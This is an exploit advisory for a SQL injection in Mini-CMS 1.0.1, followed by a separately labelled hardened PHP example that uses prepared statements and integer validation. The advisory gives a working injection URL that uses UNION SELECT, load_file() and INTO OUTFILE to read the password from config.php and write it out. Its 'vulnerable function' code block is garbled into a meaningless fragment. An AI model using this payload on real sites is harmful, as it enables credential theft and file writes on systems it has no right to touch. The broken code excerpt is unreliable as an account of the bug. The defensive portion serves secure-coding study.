[+]--------------------------------------------------------------------------------------------------------------------[+]
[+]--------------------------------------------[Mini-CMS 1.0.1 SQL injection]------------------------------------------[+]
[+]--------------------------------------------------------------------------------------------------------------------[+]
-[INFO]----------------------------------------------------------------------------------------------------------------[+]
[+] Title: Mini-CMS 1.0.1 SQL injection
[+] Author: Ins3t
[+] Site: www.arthacking.net
[+] Date: 08.08.2009
[+]--------------------------------------------------------------------------------------------------------------------[+]
-[BUG INFO]------------------------------------------------------------------------------------------------------------[+]
[+] The vulnerability is caused by insufficient filtering of parameters passed to the database. The password is stored not in the database but in the config.php file.
[+] Conditions: magic_quotes_gpc = Off | full path to the config.php file
[+] Code of the vulnerable function:
[+]-------------------------------------------------[CODE]--------------------------------------------------------------[+]
text; print("$content"); } ?>
[+]------------------------------------------------[/CODE]--------------------------------------------------------------[+]
[+] Exploit:
[+]-------------------------------------------------[CODE]--------------------------------------------------------------[+]
http://localhost/page.php?id=-1+union+select+1,2,3,4,load_file('[FULL_PATCH_OF_FILE_CONFIG.PHP]'),6,7,8,9+into+outfile+'[FULL_PATCH]'--+
[+]------------------------------------------------[/CODE]--------------------------------------------------------------[+]
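
[+] A hardened form of the id lookup, shown as an added example: it is not Mini-CMS code and not the advisory author's. The table and column names (pages, body) and the function names are hypothetical, and in-memory SQLite stands in for MySQL so the block runs offline.

```php
<?php
declare(strict_types=1);

// Hypothetical schema standing in for the CMS page table (assumption, not
// Mini-CMS's real schema). SQLite in memory replaces MySQL for the demo.
function open_demo_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE pages (id INTEGER PRIMARY KEY, body TEXT)');
    $db->exec("INSERT INTO pages (id, body) VALUES (1, 'Welcome page')");
    return $db;
}

// Returns the page body, or null when the id is malformed or unknown.
function fetch_page(PDO $db, $rawId): ?string
{
    // Accept only a positive integer; anything else never reaches SQL.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    // Bound parameter: the value travels as data, not as part of the query text,
    // so the fix does not depend on magic_quotes_gpc or any other escaping.
    $stmt = $db->prepare('SELECT body FROM pages WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $body = $stmt->fetchColumn();
    return $body === false ? null : (string) $body;
}

$db = open_demo_db();
// Constructed inputs: a valid id, a value shaped like the request above,
// trailing junk after a number, an unknown id, and an empty string.
$samples = ['1', '-1 union select 1,2,3', '1;--', '42', ''];
foreach ($samples as $raw) {
    $body = fetch_page($db, $raw);
    if ($body === null) {
        echo '[reject] id=' . var_export($raw, true) . "\n";
        continue;
    }
    echo '[ok]     id=' . var_export($raw, true) . ' -> ' . $body . "\n";
}
```

On MySQL, also run the application under an account without the FILE privilege, which LOAD_FILE() and INTO OUTFILE both require.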